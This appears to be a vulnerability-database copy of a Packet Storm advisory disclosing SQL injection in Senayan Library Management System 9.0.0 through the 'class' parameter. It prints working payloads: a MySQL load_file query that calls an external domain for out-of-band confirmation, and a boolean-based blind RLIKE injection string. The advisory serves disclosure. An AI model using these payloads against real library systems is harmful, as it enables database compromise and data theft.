Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:170184
HistoryDec 10, 2022 - 12:00 a.m.

Senayan Library Management System 9.0.0 SQL Injection

2022-12-1000:00:00
nu11secur1ty
packetstormsecurity.com
194
JSON
`## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi  
## Author: nu11secur1ty  
## Date: 11.09.2022  
## Vendor: https://slims.web.id/web/  
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi  
  
## Description:  
The manual insertion `point 3` with `class` parameter appears to be  
vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'  
was submitted in the manual insertion point 3.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
  
## STATUS: HIGH Vulnerability  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: class (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT  
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND  
'dLjf'='dLjf&membershipType=a&collType=aaaa  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)  
  
## Proof and Exploit:  
[href](http://localhost:5001/sy5wji)  
  
## Time spent  
`03:00:00`  
`
JSON